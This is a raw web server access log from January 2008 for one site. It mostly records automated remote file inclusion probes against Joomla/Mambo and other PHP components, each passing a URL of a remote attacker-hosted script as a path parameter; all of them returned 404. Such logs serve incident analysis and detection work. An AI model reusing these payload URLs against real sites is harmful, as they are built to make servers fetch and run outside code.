216.246.28.145 - - [06/Jan/2008:13:06:48 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:06:53 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:06:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:06:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:08:17 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:13:09:58 -0800] "GET /logs/index.php?option=com_ecjc_lang&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:13:09:58 -0800] "GET /index.php?option=com_ecjc_lang&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:10:32 -0800] "GET /logs/access_071229.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:10:32 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:10:32 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:10:55 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:10:55 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:10:55 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [06/Jan/2008:13:11:54 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
209.123.207.130 - - [06/Jan/2008:13:11:54 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:12:48 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.160 - - [06/Jan/2008:13:13:02 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.19 - - [06/Jan/2008:13:15:15 -0800] "GET /tmp/ HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:13:15:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:13:16:49 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.132.140.60 - - [06/Jan/2008:13:17:38 -0800] "GET /logs/access_071229.log/!scanhttp://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.132.140.60 - - [06/Jan/2008:13:17:43 -0800] "GET /logs/!scanhttp://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:21:32 -0800] "GET /logs/access_071229.log//cgi-bin/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:21:32 -0800] "GET //cgi-bin/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:21:32 -0800] "GET /logs//cgi-bin/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:21:38 -0800] "GET /logs/access_071229.log//postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:21:38 -0800] "GET //postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:21:38 -0800] "GET /logs//postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:23:17 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:23:17 -0800] "GET //modules/4nAlbum/public/displayCategory.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:23:17 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.122.223.146 - - [06/Jan/2008:13:25:38 -0800] "GET /logs/access_071229.log/configuration.php?absolute_path=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.122.223.146 - - [06/Jan/2008:13:25:38 -0800] "GET /configuration.php?absolute_path=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.122.223.146 - - [06/Jan/2008:13:25:38 -0800] "GET /logs/configuration.php?absolute_path=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.146.5.90 - - [06/Jan/2008:13:26:47 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:13:26:56 -0800] "GET /minamijewelry/source_images/?M=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.222.110.249 - - [06/Jan/2008:13:28:28 -0800] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.222.110.249 - - [06/Jan/2008:13:28:34 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.222.110.249 - - [06/Jan/2008:13:28:34 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.222.110.249 - - [06/Jan/2008:13:32:41 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:33:31 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:33:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:33:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.68.5 - - [06/Jan/2008:13:34:46 -0800] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [06/Jan/2008:13:34:46 -0800] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [06/Jan/2008:13:34:46 -0800] "GET //joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [06/Jan/2008:13:34:46 -0800] "GET //joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [06/Jan/2008:13:34:50 -0800] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [06/Jan/2008:13:34:51 -0800] "GET //joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.145.141.25 - - [06/Jan/2008:13:35:46 -0800] "GET /logs/access_071205.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:13:37:10 -0800] "GET /minamijewelry/source_images/batch1/ HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
192.220.109.46 - - [06/Jan/2008:13:37:16 -0800] "GET /configuration.php?absolute_path=http://mtin.info/tiny_includes/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:13:37:37 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:13:41:23 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:13:41:23 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:13:41:23 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:42:05 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:42:05 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:42:06 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.146.5.90 - - [06/Jan/2008:13:44:55 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.216.166.78 - - [06/Jan/2008:13:44:56 -0800] "GET /retreat1 HTTP/1.1" 301 93 "http://email.destinationhighways.com/Main/frmReadMail_body.aspx?folder=Inbox&messageid=2480&sortType=InternalDate&sortAscending=False&mapped=False&user=brianb&cRow=3&msgX=http%3A//email.destinationhighways.com/Main/frmMessagesX.aspx%3Fuser%3Dbrianb%26folder%3Dinbox%26mapped%3Dfalse%26leftnav%3Dtrue" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)" "www.dmulk.com"
64.146.5.90 - - [06/Jan/2008:13:44:56 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.216.166.78 - - [06/Jan/2008:13:44:56 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "http://email.destinationhighways.com/Main/frmReadMail_body.aspx?folder=Inbox&messageid=2480&sortType=InternalDate&sortAscending=False&mapped=False&user=brianb&cRow=3&msgX=http%3A//email.destinationhighways.com/Main/frmMessagesX.aspx%3Fuser%3Dbrianb%26folder%3Dinbox%26mapped%3Dfalse%26leftnav%3Dtrue" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)" "www.dmulk.com"
207.216.166.78 - - [06/Jan/2008:13:45:14 -0800] "GET /retreat1/BigBear.zip HTTP/1.1" 200 1966080 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)" "www.dmulk.com"
207.216.166.78 - - [06/Jan/2008:13:45:22 -0800] "GET /retreat1/IMG_2670.JPG HTTP/1.1" 200 983040 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)" "www.dmulk.com"
207.216.166.78 - - [06/Jan/2008:13:45:22 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "http://email.destinationhighways.com/Main/frmReadMail_body.aspx?folder=Inbox&messageid=2480&sortType=InternalDate&sortAscending=False&mapped=False&user=brianb&cRow=3&msgX=http%3A//email.destinationhighways.com/Main/frmMessagesX.aspx%3Fuser%3Dbrianb%26folder%3Dinbox%26mapped%3Dfalse%26leftnav%3Dtrue" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)" "www.dmulk.com"
207.216.166.78 - - [06/Jan/2008:13:45:38 -0800] "GET /retreat1/IMG_2670.JPG HTTP/1.1" 206 1769472 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)" "www.dmulk.com"
207.216.166.78 - - [06/Jan/2008:13:46:05 -0800] "GET /retreat1/IMG_2671.JPG HTTP/1.1" 200 2555904 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)" "www.dmulk.com"
129.241.104.174 - "" [06/Jan/2008:13:47:43 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "boitho.com-dc/0.85 ( http://www.boitho.com/dcbot.html )" "www.dmulk.com"
74.6.27.79 - - [06/Jan/2008:13:48:12 -0800] "GET /logs/access_070920.log HTTP/1.0" 200 56600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:49:25 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:49:25 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:49:26 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.216.166.78 - - [06/Jan/2008:13:50:56 -0800] "GET /retreat1/IMG_2672.JPG HTTP/1.1" 200 2490368 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)" "www.dmulk.com"
200.58.182.164 - - [06/Jan/2008:13:51:45 -0800] "GET /logs/admin.php?include_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.58.182.164 - - [06/Jan/2008:13:51:46 -0800] "GET /admin.php?include_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:53:59 -0800] "GET /logs/access_071229.log//postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:53:59 -0800] "GET //postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:53:59 -0800] "GET /logs//postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.216.166.78 - - [06/Jan/2008:13:54:34 -0800] "GET /retreat1/IMG_2673.JPG HTTP/1.1" 200 2490368 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)" "www.dmulk.com"
207.216.166.78 - - [06/Jan/2008:13:55:01 -0800] "GET /retreat1/IMG_2674.JPG HTTP/1.1" 200 2555904 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:55:31 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:55:31 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:55:31 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:55:31 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:55:31 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:55:31 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
168.212.152.100 - - [06/Jan/2008:13:57:08 -0800] "GET /logs/access_071222.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
168.212.152.100 - - [06/Jan/2008:13:57:08 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
168.212.152.100 - - [06/Jan/2008:13:57:08 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:59:55 -0800] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:59:55 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:13:59:55 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:14:00:11 -0800] "GET /logs/access_071222.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:14:00:11 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:14:00:11 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:00:14 -0800] "GET /logs/access_071220.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:14:00:14 -0800] "GET /logs/access_071220.log//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:14:00:14 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:14:00:14 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.146.5.90 - - [06/Jan/2008:14:01:24 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.17.228.92 - - [06/Jan/2008:14:01:37 -0800] "GET /includes/header.php?systempath=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:14:01:44 -0800] "GET /logs/access_071216.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:14:01:45 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
210.17.228.92 - - [06/Jan/2008:14:01:45 -0800] "GET /logs/includes/header.php?systempath=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:14:01:46 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
210.17.228.92 - - [06/Jan/2008:14:01:55 -0800] "GET /logs/access_071224.log/includes/header.php?systempath=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:14:02:01 -0800] "GET /logs/access_071212.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
